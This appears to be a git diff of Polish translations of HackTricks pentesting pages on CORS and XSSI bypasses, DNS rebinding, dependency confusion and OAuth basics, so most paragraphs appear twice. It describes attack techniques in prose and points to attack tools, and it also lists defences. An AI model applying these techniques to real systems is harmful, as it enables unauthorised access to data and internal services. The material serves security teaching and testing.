XSSI, znane również jako Cross-Site Script Inclusion, to rodzaj podatności, który wykorzystuje fakt, że Polityka Jednego Źródła (SOP) nie ma zastosowania podczas dołączania zasobów za pomocą tagu skryptu. Dzieje się tak, ponieważ skrypty muszą być w stanie być dołączane z różnych domen. Ta podatność pozwala atakującemu uzyskać dostęp i odczytać dowolne treści dołączone za pomocą tagu skryptu.
XSSI, znane również jako Cross-Site Script Inclusion, to rodzaj podatności, która wykorzystuje fakt, że Polityka Jednego Źródła (SOP) nie ma zastosowania podczas dołączania zasobów za pomocą tagu skryptu. Dzieje się tak dlatego, że skrypty muszą być w stanie być dołączane z różnych domen. Ta podatność pozwala atakującemu uzyskać dostęp i odczytać dowolne treści dołączone za pomocą tagu skryptu.
Ta podatność staje się szczególnie istotna, gdy chodzi o dynamiczny JavaScript lub JSONP (JSON z Paddingiem), zwłaszcza gdy informacje o uprawnieniach, takie jak ciasteczka, są używane do uwierzytelniania. Podczas żądania zasobu z innej hosta, ciasteczka są dołączane, co czyni je dostępnymi dla atakującego.
Ta podatność staje się szczególnie istotna w przypadku dynamicznego JavaScriptu lub JSONP (JSON z Paddingiem), zwłaszcza gdy używane są informacje o autoryzacji związane z uprawnieniami. Podczas żądania zasobu z innej hosta, ciasteczka są dołączane, co sprawia, że są one dostępne dla atakującego.
Aby lepiej zrozumieć i złagodzić tę podatność, można skorzystać z wtyczki BurpSuite dostępnej pod adresem [https://github.com/kapytein/jsonp](https://github.com/kapytein/jsonp). Ta wtyczka może pomóc zidentyfikować i rozwiązać potencjalne podatności XSSI w twoich aplikacjach internetowych.
Aby lepiej zrozumieć i złagodzić tę podatność, można skorzystać z wtyczki BurpSuite dostępnej pod adresem [https://github.com/kapytein/jsonp](https://github.com/kapytein/jsonp). Ta wtyczka może pomóc zidentyfikować i rozwiązać potencjalne podatności XSSI w aplikacjach internetowych.
[**Dowiedz się więcej o różnych typach XSSI i jak je wykorzystać tutaj.**](xssi-cross-site-script-inclusion.md)
Spróbuj dodać **`callback`** **parametr** w żądaniu. Być może strona została przygotowana do wysyłania danych jako JSONP. W takim przypadku strona zwróci dane z `Content-Type: application/javascript`, co ominie politykę CORS.
Spróbuj dodać **`callback`** **parametr** w żądaniu. Być może strona została przygotowana do wysyłania danych jako JSONP. W takim przypadku strona zwróci dane z `Content-Type: application/javascript`, co umożliwi obejście polityki CORS.
![](<../.gitbook/assets/image (853).png>)
### Łatwe (bezużyteczne?) ominiecie
### Łatwe (bezużyteczne?) obejście
Jednym ze sposobów na obejście ograniczenia `Access-Control-Allow-Origin` jest poproszenie aplikacji internetowej o wykonanie żądania w twoim imieniu i odesłanie odpowiedzi. Jednakże w tym scenariuszu dane uwierzytelniające ostatecznej ofiary nie zostaną wysłane, ponieważ żądanie jest wykonywane do innej domeny.
Jednym ze sposobów obejścia ograniczenia `Access-Control-Allow-Origin` jest poproszenie aplikacji internetowej o wykonanie żądania w twoim imieniu i odesłanie odpowiedzi. Jednakże, w tym scenariuszu, dane uwierzytelniające ostatecznej ofiary nie zostaną wysłane, ponieważ żądanie jest wykonywane do innej domeny.
1. [**CORS-escape**](https://github.com/shalvah/cors-escape): Narzędzie to dostarcza serwer proxy, który przekazuje twoje żądanie wraz z nagłówkami, jednocześnie podszywając się pod nagłówek Origin, aby pasował do żądanej domeny. W ten sposób efektywnie omija się politykę CORS. Oto przykładowe użycie z XMLHttpRequest:
1. [**CORS-escape**](https://github.com/shalvah/cors-escape): Narzędzie to dostarcza serwer proxy, który przekazuje twoje żądanie wraz z nagłówkami, jednocześnie podszywając się pod nagłówek Origin, aby pasował do żądanej domeny. W ten sposób efektywnie omija się politykę CORS. Oto przykładowe użycie z użyciem XMLHttpRequest:
2. [**simple-cors-escape**](https://github.com/shalvah/simple-cors-escape): To narzędzie oferuje alternatywne podejście do przekazywania żądania. Zamiast przekazywać twoje żądanie w oryginalnej postaci, serwer wykonuje własne żądanie z określonymi parametrami.
### Ominięcie za pomocą Iframe + Popup
Możesz **obejść sprawdzenia CORS**, takie jak `e.origin === window.origin`, **tworząc iframe** i **z niego otwierając nowe okno**. Więcej informacji znajdziesz na następnej stronie:
Możesz **obejść sprawdzanie CORS**, takie jak `e.origin === window.origin`, **tworząc iframe** i **otwierając z niego nowe okno**. Więcej informacji na następnej stronie:
{% content-ref url="xss-cross-site-scripting/iframes-in-xss-and-csp.md" %}
[iframes-in-xss-and-csp.md](xss-cross-site-scripting/iframes-in-xss-and-csp.md)
@ -295,30 +295,30 @@ Przełączanie DNS za pomocą TTL to technika używana do obejścia pewnych śro
1. Atakujący tworzy stronę internetową i sprawia, że ofiara ją odwiedza.
2. Następnie atakujący zmienia DNS (IP) swojej własnej domeny, aby wskazywał na stronę internetową ofiary.
3. Przeglądarka ofiary buforuje odpowiedź DNS, która może zawierać wartość TTL (Time to Live) określającą, jak długo rekord DNS powinien być uważany za ważny.
4. Gdy TTL wygaśnie, przeglądarka ofiary wykonuje nowe żądanie DNS, pozwalając atakującemu na wykonanie kodu JavaScript na stronie ofiary.
5. Utrzymując kontrolę nad IP ofiary, atakujący może zbierać informacje od ofiary bez wysyłania jakichkolwiek ciasteczek na serwer ofiary.
4. Po upływie TTL przeglądarka ofiary wykonuje nowe żądanie DNS, pozwalając atakującemu na wykonanie kodu JavaScript na stronie ofiary.
5. Utrzymując kontrolę nad IP ofiary, atakujący może zbierać informacje od ofiary bez wysyłania jakichkolwiek ciasteczek do serwera ofiary.
Warto zauważyć, że przeglądarki mają mechanizmy buforowania, które mogą zapobiec natychmiastowemu nadużyciu tej techniki, nawet przy niskich wartościach TTL.
Warto zauważyć, że przeglądarki mają mechanizmy buforowania, które mogą zapobiec natychmiastowemu wykorzystaniu tej techniki, nawet przy niskich wartościach TTL.
Przełączanie DNS może być przydatne do obejścia jawnego sprawdzania IP przeprowadzanego przez ofiarę lub w scenariuszach, w których użytkownik lub bot pozostaje na tej samej stronie przez długi czas, pozwalając buforowi wygasnąć.
Przełączanie DNS może być przydatne do obejścia jawnego sprawdzania IP przeprowadzanego przez ofiarę lub w scenariuszach, w których użytkownik lub bot pozostaje na tej samej stronie przez długi czas, co pozwala buforowi wygasnąć.
Jeśli potrzebujesz szybkiego sposobu na nadużycie przełączania DNS, możesz skorzystać z usług takich jak [https://lock.cmpxchg8b.com/rebinder.html](https://lock.cmpxchg8b.com/rebinder.html).
Jeśli potrzebujesz szybkiego sposobu na wykorzystanie przełączania DNS, możesz skorzystać z usług takich jak [https://lock.cmpxchg8b.com/rebinder.html](https://lock.cmpxchg8b.com/rebinder.html).
Aby uruchomić własny serwer przełączania DNS, możesz skorzystać z narzędzi takich jak **DNSrebinder** ([https://github.com/mogwailabs/DNSrebinder](https://github.com/mogwailabs/DNSrebinder)). Wymaga to wystawienia lokalnego portu 53/udp, utworzenia rekordu A wskazującego na niego (np. ns.example.com) oraz utworzenia rekordu NS wskazującego na wcześniej utworzoną poddomenę A (np. ns.example.com). Każda poddomena poddomeny ns.example.com będzie wówczas rozwiązywana przez twojego hosta.
Aby uruchomić własny serwer przełączania DNS, można skorzystać z narzędzi takich jak **DNSrebinder** ([https://github.com/mogwailabs/DNSrebinder](https://github.com/mogwailabs/DNSrebinder)). Wymaga to wystawienia lokalnego portu 53/udp, utworzenia rekordu A wskazującego na niego (np. ns.example.com) oraz utworzenia rekordu NS wskazującego na wcześniej utworzoną poddomenę A (np. ns.example.com). Każda poddomena poddomeny ns.example.com będzie wówczas rozwiązywana przez twój host.
Możesz także skorzystać z publicznie działającego serwera pod adresem [http://rebind.it/singularity.html](http://rebind.it/singularity.html) w celu dalszego zrozumienia i eksperymentowania.
Możesz także skorzystać z publicznie działającego serwera pod adresem [http://rebind.it/singularity.html](http://rebind.it/singularity.html) dla dalszego zrozumienia i eksperymentowania.
### Przełączanie DNS za pomocą **Zatłoczenia Pamięci Cache DNS**
### Przełączanie DNS za pomocą **Przepływu pamięci podręcznej DNS**
Przełączanie DNS za pomocą zatłoczenia pamięci cache DNS to kolejna technika używana do obejścia mechanizmu buforowania przeglądarek i wymuszenia drugiego żądania DNS. Oto jak to działa:
Przełączanie DNS za pomocą przepływu pamięci podręcznej DNS to inna technika używana do obejścia mechanizmu buforowania przeglądarek i wymuszenia drugiego żądania DNS. Oto jak to działa:
1. Początkowo, gdy ofiara wysyła żądanie DNS, otrzymuje odpowiedź z adresem IP atakującego.
2. Aby ominąć obronę buforowania, atakujący wykorzystuje pracownika usługi. Pracownik usługi zatłacza pamięć cache DNS, co efektywnie usuwa zbuforowaną nazwę serwera atakującego.
3. Gdy przeglądarka ofiary wysyła drugie żądanie DNS, otrzymuje teraz adres IP 127.0.0.1, który zazwyczaj odnosi się do lokalnego hosta.
2. Aby ominąć obronę buforowania, atakujący wykorzystuje pracownika usługi. Pracownik usługi zalewa pamięć podręczną DNS, co efektywnie usuwa zbuforowaną nazwę serwera atakującego.
3. Gdy przeglądarka ofiary wysyła drugie żądanie DNS, otrzymuje teraz odpowiedź z adresem IP 127.0.0.1, który zazwyczaj odnosi się do lokalnego hosta.
Poprzez zatłoczenie pamięci cache DNS za pomocą pracownika usługi, atakujący może manipulować procesem rozwiązywania DNS i zmusić przeglądarkę ofiary do wysłania drugiego żądania, tym razem rozwiązując je na żądany adres IP atakującego.
Poprzez zalewanie pamięci podręcznej DNS pracownikiem usługi, atakujący może manipulować procesem rozwiązywania DNS i zmusić przeglądarkę ofiary do wysłania drugiego żądania, tym razem rozwiązując się na pożądany adres IP atakującego.
### Przełączanie DNS za pomocą **Pamięci Cache**
### Przełączanie DNS za pomocą **Pamięci podręcznej**
Innym sposobem na obejście obrony buforowania jest wykorzystanie wielu adresów IP dla tej samej poddomeny w dostawcy DNS. Oto jak to działa:
@ -327,7 +327,7 @@ Innym sposobem na obejście obrony buforowania jest wykorzystanie wielu adresów
3. Jeśli przeglądarka zdecyduje się najpierw użyć adresu IP atakującego, atakujący może dostarczyć ładunek, który wykonuje żądania HTTP do tej samej domeny.
4. Jednak gdy atakujący uzyska adres IP ofiary, przestaje odpowiadać przeglądarce ofiary.
5. Przeglądarka ofiary, po zauważeniu, że domena jest niedostępna, przechodzi do użycia drugiego podanego adresu IP.
6. Poprzez dostęp do drugiego adresu IP, przeglądarka omija Politykę Jednego Źródła (SOP), pozwalając atakującemu na nadużycie tego i zbieranie oraz eksfiltrację informacji.
6. Poprzez dostęp do drugiego adresu IP, przeglądarka omija Politykę Jednego Źródła (SOP), co pozwala atakującemu wykorzystać to i uzyskać i wycieknąć informacje.
Ta technika wykorzystuje zachowanie przeglądarek, gdy dostarczane są im multiple adresy IP dla domeny. Poprzez strategiczne kontrolowanie odpowiedzi i manipulowanie wyborem adresu IP przez przeglądarkę, atakujący może wykorzystać SOP i uzyskać dostęp do informacji od ofiary.
@ -339,28 +339,28 @@ Dostawcy takie jak godaddy lub cloudflare nie pozwoliły mi na użycie adresu IP
{% endhint %}
Aby uzyskać więcej informacji, możesz sprawdzić [https://unit42.paloaltonetworks.com/dns-rebinding/](https://unit42.paloaltonetworks.com/dns-rebinding/)
### Inne powszechne metody bypassowania
### Inne powszechne metody obchodzenia
* Jeśli **wewnętrzne adresy IP nie są dozwolone**, mogą **zapomnieć o zakazaniu 0.0.0.0** (działa w systemach Linux i Mac)
* Jeśli **wewnętrzne adresy IP nie są dozwolone**, odpowiedz **CNAME** na **localhost** (działa w systemach Linux i Mac)
* Jeśli **wewnętrzne adresy IP nie są dozwolone** w odpowiedziach DNS, można odpowiedzieć **CNAME na wewnętrzne usługi** takie jak www.corporate.internal.
* Jeśli **wewnętrzne adresy IP nie są dozwolone** jako odpowiedzi DNS, można odpowiedzieć **CNAME na wewnętrzne usługi** takie jak www.corporate.internal.
### Uzbrojone ataki DNS Rebidding
Więcej informacji na temat poprzednich technik bypassowania i jak korzystać z poniższego narzędzia można znaleźć w prezentacji [Gerald Doussot - State of DNS Rebinding Attacks & Singularity of Origin - Konferencja DEF CON 27](https://www.youtube.com/watch?v=y9-0lICNjOQ).
Więcej informacji na temat poprzednich technik obchodzenia i jak korzystać z poniższego narzędzia można znaleźć w prezentacji [Gerald Doussot - State of DNS Rebinding Attacks & Singularity of Origin - Konferencja DEF CON 27](https://www.youtube.com/watch?v=y9-0lICNjOQ).
[**`Singularity of Origin`**](https://github.com/nccgroup/singularity) to narzędzie do przeprowadzania ataków [DNS rebinding](https://en.wikipedia.org/wiki/DNS\_rebinding). Zawiera niezbędne komponenty do przypisania adresu IP nazwy DNS serwera atakującego do adresu IP maszyny docelowej i serwowania ładunków ataku w celu wykorzystania podatnego oprogramowania na maszynie docelowej.
[**`Singularity of Origin`**](https://github.com/nccgroup/singularity) to narzędzie do przeprowadzania ataków [DNS rebinding](https://en.wikipedia.org/wiki/DNS\_rebinding). Zawiera niezbędne komponenty do przypisania adresu IP serwera atakującego nazwie DNS do adresu IP maszyny docelowej i serwowania ładunków ataku w celu wykorzystania podatnego oprogramowania na maszynie docelowej.
### Rzeczywista ochrona przed atakami DNS Rebinding
* Używaj TLS w wewnętrznych usługach
* Wymagaj uwierzytelnienia do dostępu do danych
* Sprawdzaj nagłówek Host
* [https://wicg.github.io/private-network-access/](https://wicg.github.io/private-network-access/): Propozycja zawsze wysyłania żądania pre-flight, gdy publiczne serwery chcą uzyskać dostęp do serwerów wewnętrznych
* [https://wicg.github.io/private-network-access/](https://wicg.github.io/private-network-access/): Propozycja zawsze wysyłania żądania pre-flight, gdy serwery publiczne chcą uzyskać dostęp do serwerów wewnętrznych
## **Narzędzia**
**Testuj możliwe błędy w politykach CORS**
**Testuj możliwe błędy konfiguracji w politykach CORS**
* [https://portswigger.net/bappstore/420a28400bad4c9d85052f8d66d3bbd8](https://portswigger.net/bappstore/420a28400bad4c9d85052f8d66d3bbd8)
* [https://github.com/chenjj/CORScanner](https://github.com/chenjj/CORScanner)
@ -382,7 +382,7 @@ Więcej informacji na temat poprzednich technik bypassowania i jak korzystać z
* [https://medium.com/entersoftsecurity/every-bug-bounty-hunter-should-know-the-evil-smile-of-the-jsonp-over-the-browsers-same-origin-438af3a0ac3b](https://medium.com/entersoftsecurity/every-bug-bounty-hunter-should-know-the-evil-smile-of-the-jsonp-over-the-browsers-same-origin-438af3a0ac3b)
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -392,10 +392,10 @@ Więcej informacji na temat poprzednich technik bypassowania i jak korzystać z
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF** sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Kup [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegram**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub **grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

26
pentesting-web/dependency-confusion.md
View file

@ -4,15 +4,15 @@
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Czy pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć swoją **firmę reklamowaną na HackTricks**? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Czy pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć swoją **firmę reklamowaną na HackTricks**? lub chcesz uzyskać dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) albo **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do [repozytorium hacktricks](https://github.com/carlospolop/hacktricks) i [repozytorium hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -23,7 +23,7 @@ W skrócie, podatność na dependency confusion występuje, gdy projekt używa b
* **Błędnie napisana**: Importuj **`reqests`** zamiast `requests`
* **Nieistniejąca**: Importuj `company-logging`, wewnętrzną bibliotekę, która **już nie istnieje**
* **Nieokreślona wersja**: Importuj **wewnętrzną** **istniejącą** bibliotekę `company-requests`, ale repo sprawdza **publiczne repozytoria**, aby zobaczyć, czy są **nowsze wersje**.
* **Nieokreślona wersja**: Importuj **wewnętrzną** **istniejącą** bibliotekę `company-requests`, ale sprawdź repozytorium **publiczne repozytoria**, aby zobaczyć, czy są **nowsze wersje**.
## Wykorzystanie
@ -33,16 +33,16 @@ W każdym przypadku atakujący musi tylko opublikować **złośliwy pakiet o naz
### Błędnie napisana & Nieistniejąca
Jeśli twoja firma próbuje **importować bibliotekę, która nie jest wewnętrzna**, bardzo prawdopodobne jest, że repozytorium bibliotek będzie próbować jej znaleźć w **publicznych repozytoriach**. Jeśli atakujący ją stworzył, twój kod i uruchomione maszyny prawdopodobnie zostaną skompromitowane.
Jeśli twoja firma próbuje **importować bibliotekę, która nie jest wewnętrzna**, bardzo prawdopodobne jest, że repozytorium bibliotek będzie próbować jej znaleźć w **publicznych repozytoriach**. Jeśli atakujący ją stworzył, twój kod i uruchomione maszyny są bardzo prawdopodobnie zagrożone.
### Nieokreślona wersja
Bardzo często deweloperzy **nie określają żadnej wersji** używanej biblioteki, lub określają tylko **główną wersję**. Wtedy interpreter spróbuje pobrać **najnowszą wersję** spełniającą te wymagania.\
Jeśli biblioteka jest **znaną zewnętrzną biblioteką** (jak python `requests`), **atakujący nie może zrobić wiele**, ponieważ nie będzie mógł stworzyć biblioteki o nazwie `requests` (chyba że jest oryginalnym autorem).\
Jednak jeśli biblioteka jest **wewnętrzna**, jak `requests-company` w tym przykładzie, jeśli **repozytorium biblioteki** pozwala na **sprawdzanie nowych wersji również zewnętrznie**, będzie szukać nowszej wersji publicznie dostępnej.\
Więc jeśli **atakujący wie**, że firma używa biblioteki `requests-company` **wersji 1.0.1** (pozwala na aktualizacje mniejsze). Może **opublikować** bibliotekę `requests-company` **wersji 1.0.2** i firma **będzie używać tej biblioteki zamiast wewnętrznej**.
Bardzo często deweloperzy **nie określają żadnej wersji** używanej biblioteki, lub określają tylko **główną wersję**. W takim przypadku interpreter spróbuje pobrać **najnowszą wersję**, spełniającą te wymagania.\
Jeśli biblioteka jest **znaną zewnętrzną biblioteką** (jak python `requests`), **atakujący nie może zrobić wiele**, ponieważ nie będzie mógł stworzyć biblioteki o nazwie `requests` (chyba że jest jej oryginalnym autorem).\
Jednakże, jeśli biblioteka jest **wewnętrzna**, jak `requests-company` w tym przykładzie, jeśli **repozytorium biblioteki** pozwala na **sprawdzanie nowych wersji również zewnętrznie**, będzie szukać nowszej publicznie dostępnej wersji.\
Więc jeśli **atakujący wie**, że firma używa biblioteki `requests-company` **wersja 1.0.1** (zezwala na aktualizacje mniejsze). Może **opublikować** bibliotekę `requests-company` **wersja 1.0.2** i firma **będzie używać tej biblioteki zamiast wewnętrznej**.
## Poprawka AWS
## Naprawa w AWS
Ta podatność została znaleziona w AWS **CodeArtifact** (przeczytaj [**szczegóły w tym wpisie na blogu**](https://zego.engineering/dependency-confusion-in-aws-codeartifact-86b9ff68963d)).\
AWS naprawiło to, pozwalając określić, czy biblioteka jest wewnętrzna czy zewnętrzna, aby uniknąć pobierania wewnętrznych zależności z zewnętrznych repozytoriów.
@ -56,7 +56,7 @@ W [**oryginalnym poście o dependency confusion**](https://medium.com/@alex.birs
* [https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)
* [https://zego.engineering/dependency-confusion-in-aws-codeartifact-86b9ff68963d](https://zego.engineering/dependency-confusion-in-aws-codeartifact-86b9ff68963d)
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -64,10 +64,10 @@ W [**oryginalnym poście o dependency confusion**](https://medium.com/@alex.birs
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Czy pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć swoją **firmę reklamowaną na HackTricks**? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Czy pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć swoją **firmę reklamowaną na HackTricks**? lub chcesz uzyskać dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) albo **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do [repozytorium hacktricks](https://github.com/carlospolop/hacktricks) i [repozytorium hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
</details>

90
pentesting-web/oauth-to-account-takeover.md
View file

@ -14,30 +14,30 @@ Inne sposoby wsparcia HackTricks:
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
## Podstawowe informacje <a href="#d4a8" id="d4a8"></a>
OAuth oferuje różne wersje, z podstawowymi informacjami dostępnymi na stronie [dokumentacji OAuth 2.0](https://oauth.net/2/). Ta dyskusja skupia się głównie na powszechnie używanym [typie autoryzacji OAuth 2.0](https://oauth.net/2/grant-types/authorization-code/), zapewniającym **framework autoryzacji, który umożliwia aplikacji dostęp lub wykonywanie działań na koncie użytkownika w innej aplikacji** (serwer autoryzacji).
OAuth oferuje różne wersje, z podstawowymi informacjami dostępnymi na stronie [dokumentacji OAuth 2.0](https://oauth.net/2/). Ta dyskusja koncentruje się głównie na powszechnie używanym [typie udzielenia autoryzacji OAuth 2.0](https://oauth.net/2/grant-types/authorization-code/), zapewniającym **framework autoryzacji, który umożliwia aplikacji dostęp lub wykonywanie działań na koncie użytkownika w innej aplikacji** (serwer autoryzacji).
Rozważmy hipotetyczną stronę internetową _**https://example.com**_, zaprojektowaną do **prezentowania wszystkich Twoich postów na mediach społecznościowych**, w tym tych prywatnych. Aby to osiągnąć, wykorzystywane jest OAuth 2.0. _https://example.com_ poprosi o zgodę na **dostęp do Twoich postów na mediach społecznościowych**. W rezultacie na _https://socialmedia.com_ pojawi się ekran zgody, przedstawiający **uprawnienia, które są żądane, oraz dewelopera dokonującego żądania**. Po udzieleniu zgody, _https://example.com_ uzyskuje możliwość **dostępu do Twoich postów w Twoim imieniu**.
Rozważmy hipotetyczną stronę internetową _**https://example.com**_, zaprojektowaną do **prezentowania wszystkich twoich postów na mediach społecznościowych**, w tym tych prywatnych. Aby to osiągnąć, wykorzystywane jest OAuth 2.0. _https://example.com_ poprosi o zgodę na **dostęp do twoich postów na mediach społecznościowych**. W rezultacie na _https://socialmedia.com_ pojawi się ekran zgody, przedstawiający **uprawnienia, które są żądane, oraz dewelopera dokonującego żądania**. Po udzieleniu autoryzacji, _https://example.com_ uzyskuje możliwość **dostępu do twoich postów w twoim imieniu**.
Należy zrozumieć następujące komponenty w ramach frameworka OAuth 2.0:
- **właściciel zasobu**: Ty, jako **użytkownik/encja**, autoryzujesz dostęp do swojego zasobu, takiego jak Twoje posty na mediach społecznościowych.
- **serwer zasobów**: Serwer zarządzający uwierzytelnionymi żądaniami po tym, jak aplikacja uzyskała `token dostępu` w imieniu `właściciela zasobu`, np. **https://socialmedia.com**.
- **aplikacja klienta**: Aplikacja, która **poszukuje autoryzacji** od `właściciela zasobu`, taka jak **https://example.com**.
- **właściciel zasobu**: Ty, jako **użytkownik/encja**, autoryzujesz dostęp do swojego zasobu, takiego jak twoje posty na koncie w mediach społecznościowych.
- **serwer zasobów**: Serwer **zarządzający uwierzytelnionymi żądaniami** po tym, jak aplikacja uzyskała `token dostępu` w imieniu `właściciela zasobu`, np. **https://socialmedia.com**.
- **aplikacja klienta**: Aplikacja **żądająca autoryzacji** od `właściciela zasobu`, taka jak **https://example.com**.
- **serwer autoryzacji**: Serwer, który wydaje `tokeny dostępu` dla `aplikacji klienta` po pomyślnym uwierzytelnieniu `właściciela zasobu` i uzyskaniu autoryzacji, np. **https://socialmedia.com**.
- **client\_id**: Publiczny, unikalny identyfikator aplikacji.
- **client\_secret:** Poufny klucz, znany tylko aplikacji i serwerowi autoryzacji, używany do generowania `tokenów dostępu`.
- **client\_secret:** Poufny klucz, znany wyłącznie aplikacji i serwerowi autoryzacji, używany do generowania `tokenów dostępu`.
- **response\_type**: Wartość określająca **typ żądanego tokenu**, np. `code`.
- **scope**: **Poziom dostępu**, który `aplikacja klienta` żąda od `właściciela zasobu`.
- **redirect\_uri**: **URL, do którego użytkownik jest przekierowywany po autoryzacji**. Zazwyczaj musi to być zgodne z wcześniej zarejestrowanym adresem przekierowania.
- **state**: Parametr służący do **przechowywania danych podczas przekierowania użytkownika do i z serwera autoryzacji**. Jego unikalność jest kluczowa dla pełnienia roli **mechanizmu ochrony CSRF**.
- **grant\_type**: Parametr wskazujący **typ autoryzacji i typ zwracanego tokenu**.
- **grant\_type**: Parametr wskazujący **typ udzielenia autoryzacji i typ zwracanego tokenu**.
- **code**: Kod autoryzacji z `serwera autoryzacji`, używany wspólnie z `client_id` i `client_secret` przez aplikację klienta do uzyskania `tokena dostępu`.
- **access\_token**: **Token, którego aplikacja klienta używa do żądań API** w imieniu `właściciela zasobu`.
- **refresh\_token**: Umożliwia aplikacji **uzyskanie nowego `tokena dostępu` bez ponownego pytania użytkownika**.
@ -47,7 +47,7 @@ Należy zrozumieć następujące komponenty w ramach frameworka OAuth 2.0:
**Rzeczywisty przepływ OAuth** przebiega następująco:
1. Przechodzisz do [https://example.com](https://example.com) i wybierasz przycisk „Integruj z mediami społecznościowymi”.
2. Strona wysyła żądanie do [https://socialmedia.com](https://socialmedia.com), prosząc o Twoją autoryzację, aby pozwolić aplikacji https://example.com na dostęp do Twoich postów. Żądanie jest zbudowane w następujący sposób:
2. Strona wysyła żądanie do [https://socialmedia.com](https://socialmedia.com), prosząc o twoją autoryzację, aby pozwolić aplikacji https://example.com na dostęp do twoich postów. Żądanie jest zbudowane w następujący sposób:
```
https://socialmedia.com/auth
?response_type=code
